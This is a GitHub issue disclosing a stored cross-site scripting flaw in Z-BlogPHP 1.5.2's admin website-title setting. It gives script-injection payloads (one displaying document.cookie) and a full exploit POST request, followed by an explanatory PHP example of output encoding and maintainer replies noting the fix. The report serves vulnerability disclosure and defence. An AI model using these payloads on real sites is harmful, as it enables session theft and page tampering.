
Z-Blog php has a stored Cross Site Scripting Vulnerability #185

Closed
Oran9e opened this issue May 2, 2018 · 2 comments

Comments

Oran9e commented May 2, 2018

Z-Blog php has a stored Cross Site Scripting Vulnerability
I have found a stored Cross Site Scripting Vulnerability.
Log into the system with the administrator role: http://127.0.0.1/test/zblogphp-master/zb_system/admin/index.php
Web site settings --> Basic setting --> Website title
Payload: "/><script>confirm(1234)</script>
Save it.

Exploit request:
POST /test/zblogphp-master/zb_system/cmd.php?act=SettingSav&csrfToken=30440aaabfe797968365be7946a0fc8a HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/zblogphp-master/zb_system/admin/index.php?act=SettingMng
Content-Type: application/x-www-form-urlencoded
Content-Length: 1019
Cookie: timezone=8; username=admin; token=67afc0921f3adc02c6b8a8c32fa68c53ebac56e9a16a92342924e9d05609f78f1525347253; addinfotestzblogphp-master=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D; PHPSESSID=sv1dq8htd2l5heme25b1b2vvb1; artshu=1; xiaoxi=%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_yi_jian_jian_yi_2821%2F+target%3D_blank%3E%E6%84%8F%E8%A7%81%E5%BB%BA%E8%AE%AEBUG%E5%8F%8D%E9%A6%88%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_update_download%2F+target%3D_blank%3E20171101+axublog%E5%BB%BA%E7%AB%99%E7%B3%BB%E7%BB%9F1.0.6%E6%9B%B4%E6%96%B0%E4%B8%8B%E8%BD%BD%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_update_download%2F+target%3D_blank%3E20170804+axublog%E5%BB%BA%E7%AB%99%E7%B3%BB%E7%BB%9F1.0.5%E6%9B%B4%E6%96%B0%E4%B8%8B%E8%BD%BD%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_mo_ban_xia_zai_3611%2F+target%3D_blank%3E20170804+axublog%E6%A8%A1%E6%9D%BF%E4%B8%8B%E8%BD%BD%EF%BC%9Auedc%E3%80%90%E9%80%82%E5%90%881.0.5%E7%89%88%E6%9C%AC%E3%80%91%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_0038%2F+target%3D_blank%3E20170619+axublog%E5%BB%BA%E7%AB%99%E7%B3%BB%E7%BB%9F1.0.2%E6%9B%B4%E6%96%B0%E4%B8%8B%E8%BD%BD%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_221437%2F+target%3D_blank%3E20170616+axublog1.0.1%E5%8F%91%E5%B8%83%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Fben_zhan_xian_zai_yong_de_hei_bai_190507%2F+target%3D_blank%3E20170614+%E9%BB%91%E7%99%BD%E8%93%9D%E4%B8%BB%E9%A2%98%E4%B8%8B%E8%BD%BD%3C%2Fa%3E+%3C%2Fp%3E+%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog100_jie_shao_he_181144%2F+target%3D_blank%3E20170610+axublog1.0.0%E5%8F%91%E5%B8%83%3C%2Fa%3E%3C%2Fp%3E%0D%0A
Connection: keep-alive
Upgrade-Insecure-Requests: 1

ZC_BLOG_HOST=http%3A%2F%2F127.0.0.1%2Ftest%2Fzblogphp-master%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=zblog"/><script>confirm(1234)</script>&ZC_BLOG_SUBNAME=Good+Luck+To+You%21&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba%7Casa&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_ADDITIONAL_SECURITY=1&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=

Payload: "/><script>confirm(document.cookie)</script>

Affected Version:
1.5.2
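To show what the report above is exercising and what the fix looks like on the rendering side, here is an added example that is not Z-BlogPHP's own code: the stored ZC_BLOG_NAME value (the field and payload are taken from the request above; the value itself is a constructed sample) is rendered into an HTML attribute first without and then with context-aware output encoding. The functions render_title_unsafe, render_title_safe, encode_attr and contains_raw_markup are hypothetical names for this illustration.

```php
<?php
// Added example (not Z-BlogPHP's own code): why a raw setting value breaks
// out of an HTML attribute, and how output encoding for that context stops it.

// Constructed sample value: the ZC_BLOG_NAME payload from the report above.
$blogName = 'zblog"/><script>confirm(1234)</script>';

// Vulnerable pattern: the stored setting is interpolated straight into markup.
// The quote inside the value terminates the attribute, the "/>" closes the
// element, and the remainder is parsed by the browser as a new <script> tag.
function render_title_unsafe(string $name): string
{
    return '<input type="text" name="ZC_BLOG_NAME" value="' . $name . '" />';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both " and ' so the value can never close the attribute;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function encode_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_title_safe(string $name): string
{
    return '<input type="text" name="ZC_BLOG_NAME" value="' . encode_attr($name) . '" />';
}

// Check for the demonstration: an encoded attribute value must contain no raw
// character that HTML could read as a tag delimiter or a quote.
function contains_raw_markup(string $value): bool
{
    return preg_match('/[<>"\']/', $value) === 1;
}

echo "Unsafe: ", render_title_unsafe($blogName), PHP_EOL;
echo "Safe:   ", render_title_safe($blogName), PHP_EOL;
echo "Encoded value still carries raw markup? ",
    contains_raw_markup(encode_attr($blogName)) ? 'yes' : 'no', PHP_EOL;
```

Run it with `php example.php`. The point to take from it is that the value is encoded when it is written into the page, not when it is saved: the stored title stays intact, and the same value would need a different encoder if it were later placed inside a JavaScript string or a URL rather than an HTML attribute.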

zsxsoft (Contributor) commented May 2, 2018

If you have admin privileges, there are so many self-XSS ways. This is just a functional bug that can break the management page.
By the way, we will fix this bug, thank you.

zsxsoft added the BUG label May 2, 2018

zsxsoft (Contributor) commented May 2, 2018

P.S. To save our time, please don't submit useless "XSS" reports; some of them are even features. For example, injecting "<script>" into an article title or content.

rainbowsoft added a commit that referenced this issue May 3, 2018
Also fixed a back-end information issue;
zsxsoft closed this as completed May 4, 2018
zsxsoft pushed a commit that referenced this issue Jul 4, 2018
Also fixed a back-end information issue;